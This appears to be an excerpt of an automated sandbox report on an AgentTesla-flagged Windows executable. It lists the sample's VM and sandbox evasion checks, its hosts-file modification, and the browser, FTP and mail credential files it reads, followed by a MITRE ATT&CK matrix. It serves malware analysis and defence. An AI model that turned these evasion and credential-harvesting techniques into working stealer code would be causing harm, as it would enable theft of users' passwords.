                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion:

                  barindex
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5716Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5716Thread sleep count: 106 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5716Thread sleep time: -3180000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5716Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 1556Thread sleep count: 133 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 1556Thread sleep time: -66500s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5716Thread sleep time: -57158s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exe TID: 5716Thread sleep time: -56970s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05992EF6 GetSystemInfo,0_2_05992EF6
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD2DA0 LdrInitializeThunk,0_2_00DD2DA0
                  Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Modifies the hosts fileShow sources
                  Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
                  Source: file.exe, 00000000.00000002.611469104.00000000016B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings:

                  barindex
                  Modifies the hosts fileShow sources
                  Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: file.exe, type: SAMPLE
                  Source: Yara matchFile source: 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.228406188.00000000008D2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5448, type: MEMORY
                  Source: Yara matchFile source: 0.2.file.exe.8d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.8d0000.0.unpack, type: UNPACKEDPE
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Tries to harvest and steal ftp login credentialsShow sources
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5448, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: file.exe, type: SAMPLE
                  Source: Yara matchFile source: 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.228406188.00000000008D2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5448, type: MEMORY
                  Source: Yara matchFile source: 0.2.file.exe.8d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.8d0000.0.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation211Path InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection1File and Directory Permissions Modification1Input Capture11Security Software Discovery111Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion13Credentials in Registry1Virtualization/Sandbox Evasion13SMB/Windows Admin SharesArchive Collected Data11Automated ExfiltrationApplication Layer Protocol11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSProcess Discovery2Distributed Component Object ModelData from Local System2Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptAccess Token Manipulation1LSA SecretsSystem Information Discovery115SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDeobfuscate/Decode Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue